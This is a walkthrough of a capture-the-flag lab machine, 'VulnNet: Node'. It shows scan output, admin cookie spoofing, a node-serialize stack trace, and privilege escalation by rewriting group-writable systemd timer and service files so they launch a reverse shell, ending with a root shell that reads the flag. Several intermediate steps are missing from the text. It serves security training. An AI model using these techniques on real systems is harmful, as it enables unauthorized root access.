# Nmap 7.91 scan initiated Mon Mar 29 15:50:00 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.45.222 Nmap scan report for 10.10.45.222 Host is up (0.025s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 8080/tcp open http Node.js Express framework |_http-open-proxy: Proxy might be redirecting requests |_http-title: VulnNet – Your reliable news source – Try Now!
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Mar 29 15:51:26 2021 -- 1 IP address (1 host up) scanned in 85.79 seconds
But using this cookie the app doesn't redirect us anywhere when requesting /login.
However on the home page we can see Welcome, admin, acknowledging the cookie
spoofing worked.
Let's request the home page with an erroneous cookie, maybe a stack trace could leak
some technology used.
Sending a partially deleted cookie returns an HTTP error 500 and the following
stack trace:
1 2 3 4 5 6 7 8 9 10 11
SyntaxError: Unexpected end of JSON input at JSON.parse (<anonymous>) at Object.exports.unserialize (/home/www/VulnNet-Node/node_modules/node-serialize/lib/serialize.js:62:16) at /home/www/VulnNet-Node/server.js:16:24 at Layer.handle [as handle_request] (/home/www/VulnNet-Node/node_modules/express/lib/router/layer.js:95:5) at next (/home/www/VulnNet-Node/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/home/www/VulnNet-Node/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/home/www/VulnNet-Node/node_modules/express/lib/router/layer.js:95:5) at /home/www/VulnNet-Node/node_modules/express/lib/router/index.js:281:22 at Function.process_params (/home/www/VulnNet-Node/node_modules/express/lib/router/index.js:335:12) at next (/home/www/VulnNet-Node/node_modules/express/lib/router/index.js:275:10)
We have a helpful full path disclosure and we notice that an unserialization is
done.
We can start/stop a systemd timer called vulnnet-auto:
1 2 3 4 5 6 7 8 9
$ sudo -l Matching Defaults entries for serv-manage on vulnnet-node: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User serv-manage may run the following commands on vulnnet-node: (root) NOPASSWD: /bin/systemctl start vulnnet-auto.timer (root) NOPASSWD: /bin/systemctl stop vulnnet-auto.timer (root) NOPASSWD: /bin/systemctl daemon-reload
With systemctl status we can find the path of the timer file:
1 2 3 4 5
$ systemctl status vulnnet-auto.timer ● vulnnet-auto.timer - Run VulnNet utilities every 30 min Loaded: loaded (/etc/systemd/system/vulnnet-auto.timer; disabled; vendor preset: enabled) Active: inactive (dead) Trigger: n/a
The file is writable by our user:
1 2
$ ls -lh /etc/systemd/system/vulnnet-auto.timer -rw-rw-r-- 1 root serv-manage 167 Jan 24 16:59 /etc/systemd/system/vulnnet-auto.timer
Let's see /etc/systemd/system/vulnnet-auto.timer:
1 2 3 4 5 6 7 8 9 10 11
[Unit] Description=Run VulnNet utilities every 30 min
[Timer] OnBootSec=0min # 30 min job OnCalendar=*:0/30 Unit=vulnnet-job.service
[Install] WantedBy=basic.target
The timer is starting a job after 30min.
We can find the service and see it is writable by our user:
1 2 3 4 5 6 7
$ systemctl status vulnnet-job.service ● vulnnet-job.service - Logs system statistics to the systemd journal Loaded: loaded (/etc/systemd/system/vulnnet-job.service; disabled; vendor preset: enabled) Active: inactive (dead)
$ ls -lh /etc/systemd/system/vulnnet-job.service -rw-rw-r-- 1 root serv-manage 197 Jan 24 21:40 /etc/systemd/system/vulnnet-job.service
/etc/systemd/system/vulnnet-job.service
1 2 3 4 5 6 7 8 9 10 11
[Unit] Description=Logs system statistics to the systemd journal Wants=vulnnet-auto.timer
[Service] # Gather system statistics Type=forking ExecStart=/bin/df
[Install] WantedBy=multi-user.target
Let's replace the executed payload with a reverse shell in /etc/systemd/system/vulnnet-job.service.
$ pwncat -lvv 7777 INFO: Listening on :::7777 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:7777 (family 2/IPv4, TCP) INFO: Client connected from 10.10.163.253:40950 (family 2/IPv4, TCP) bash: cannot set terminal process group (1359): Inappropriate ioctl for device bash: no job control in this shell root@vulnnet-node:/# id uid=0(root) gid=0(root) groups=0(root) root@vulnnet-node:/# cat /root/root.txt